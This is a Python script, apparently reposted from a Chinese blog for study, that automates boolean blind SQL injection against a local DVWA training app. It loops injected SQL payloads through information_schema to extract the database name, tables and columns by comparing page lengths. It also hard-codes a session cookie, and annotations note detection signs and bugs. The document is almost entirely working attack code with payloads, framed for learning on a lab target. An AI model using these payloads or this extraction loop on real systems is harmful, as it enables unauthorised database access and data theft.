python dvwa布尔盲注自动化脚本(level=low)

 仅供学习代码参考
# DVWA boolean-based blind SQL injection automation script (security level: low).
#
# Flat script with no functions: every statement, including all HTTP requests, runs at import time.
# The target is a local DVWA instance (INIT_URL points at 127.0.0.1), a deliberately vulnerable
# training application. The inference oracle is response length only: each probe's body length is
# compared with rightLen, the length of the page returned for the known-good id=1 (step 0 below).
#
# Defender's view: each step issues one HTTP GET per candidate value, with `information_schema`,
# single quotes and an encoded `#` (%23) in the query string -- a high-volume, highly regular
# pattern that request logging, rate limiting or a WAF can pick up. Filtering these URLs does not
# remove the weakness; the string-built SQL behind the page needs a parameterised query.
import requests
import string
import time
INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
# Login identity: DVWA's security-level cookie plus a fixed PHPSESSID copied from a logged-in browser.
# This is a live session secret hard-coded in source: it stops working when the server session ends,
# and committing it leaks that session for as long as it stays valid.
token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"}  # login identity (session cookies)
COLUMN_NUM=11    # fixed upper bound on columns probed per table (never discovered, always tried)
COLUMN_LEN=15    # fixed upper bound on name positions probed for each table/column name
dbLen=0          # guessed length of database()
dbname=''        # recovered database name
table_num=0      # number of tables in dbname, from step 3
table=[]         # recovered table names
table_name=''    # scratch buffer for the table name currently being assembled
column=[]        # one '/'-joined string of column names per table
column_name=''   # scratch buffer for the column names of the current table
rightLen=0       # baseline body length for a TRUE condition (set in step 0)

time_start=time.time()
# Step 0: baseline. id=1 is an existing row, so its page length is what a TRUE injected condition returns.
url=INIT_URL+"1&Submit=Submit#"
rightLen=len(requests.get(url=url,cookies=token).text)
print("正常返回文本长度:"+str(rightLen))
# Step 1: guess the length of the database name, one request per candidate length.
# Original poc comment: " 1'and (select length(database()))="+str(dbLen)#"
# %23 is the URL-encoded '#' that comments out the remainder of the page's query; the literal '#'
# after Submit=Submit is a URL fragment and is not part of the request sent to the server.
# NOTE(review): there is no upper bound here. If no length ever matches, this loop never ends; if
# every response has the same length (e.g. an expired session returning the same page for every
# probe), the very first probe "matches" and everything downstream is garbage.
while True:
    dbLen +=1
    dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"
    print(dbUrl)
    if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:
        print("数据库长度:"+str(dbLen))
        break
# Step 2: recover the database name one position at a time.
# Original poc comment: " 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"
# Only a-z are tried: a position holding any other character matches no candidate and nothing is
# appended for it, so dbname can come back shorter than dbLen.
for i in range(1,dbLen+1):
    for j in string.ascii_lowercase:
        dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"
        print(dbnameUrl)
        if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:
            dbname+=j
            break

print("数据库名字:"+dbname)

# Step 3: count the tables in the schema; candidates 0..99 are tried in order and table_num keeps its
# initial 0 if none matches (which makes steps 4 and 5 no-ops).
# Original poc comment: " 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"

for i in range(100):
    dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"
    print(dbUrl)
    if len(requests.get(dbUrl,cookies=token).text)==rightLen:
        print("表数量"+str(i))
        table_num=i
        break

# Step 4: recover each table name. i selects the table (limit i,1), k the position in the name,
# j the candidate byte; 48..122 covers '0'..'z'. Each name costs up to COLUMN_LEN*75 requests, and a
# position with no matching candidate is simply skipped.
# Original poc comment: " 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#

for i in range(table_num):
    for k in range(COLUMN_LEN):
        for j in range(48,123):
            dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
            print(dbUrl)
            if len(requests.get(dbUrl,cookies=token).text)==rightLen:
                table_name+=chr(j)
                print(table_name)
                break
    # one table finished: store it and reset the scratch buffer
    table.append(table_name)
    table_name=''
print("表名:"+str(table))



# Step 5: recover column names for every table found in step 4. m selects the table, i the column
# (limit i,1), k the position, j the candidate byte. The names of one table are joined with '/' into
# a single string. COLUMN_NUM is a fixed bound: for a table with fewer columns the remaining i
# iterations presumably match nothing and only add wasted requests plus an extra '/' separator.
# Original poc comment: " 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i


for m in range(table_num):
    for i in range(COLUMN_NUM):
        for k in range(COLUMN_LEN):
            for j in range(48,123):
                dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
                print(dbUrl)
                if len(requests.get(dbUrl,cookies=token).text)==rightLen:
                    column_name+=chr(j)
                    print(column_name)
                    break
        # separator between consecutive column names of the same table
        column_name+='/'
    column.append(column_name)
    column_name=''
print("列名:"+str(column))

time_end=time.time()
print('用时:',time_end-time_start,'s')
print("正常返回文本长度:"+str(rightLen))
print("数据库长度:"+str(dbLen))
print("数据库名字:"+dbname)
# NOTE(review): i here is whatever the last loop left in it (the step-5 column index when
# table_num > 0), not the table count; table_num is the variable that holds that value.
print("表数量"+str(i))
print("表名:"+str(table))
print("列名:"+str(column))
# Step 6 (not implemented): dumping row values.
# Original poc comment: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i
# Author's note: probe specific columns individually; guessing everything this way takes far too long.


原文地址:https://www.cnblogs.com/llj9527/p/14001720.html